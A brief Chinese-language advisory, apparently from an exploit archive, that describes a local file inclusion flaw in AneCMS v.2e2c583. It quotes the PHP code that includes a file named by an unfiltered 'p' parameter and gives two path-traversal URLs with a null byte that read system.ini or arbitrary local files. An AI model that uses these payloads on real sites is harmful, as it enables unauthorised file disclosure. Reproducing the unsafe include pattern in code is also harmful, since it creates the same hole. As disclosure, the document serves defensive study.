標(biāo)題: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH
軟件開發(fā)網(wǎng)站: https://github.com/AneGroup/AneCMS
影響版本: v.2e2c583
概述
source of index.php頁(yè)面存在缺陷
代碼分析如下
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
測(cè)試證明
http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00
http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00
提供修復(fù):
過濾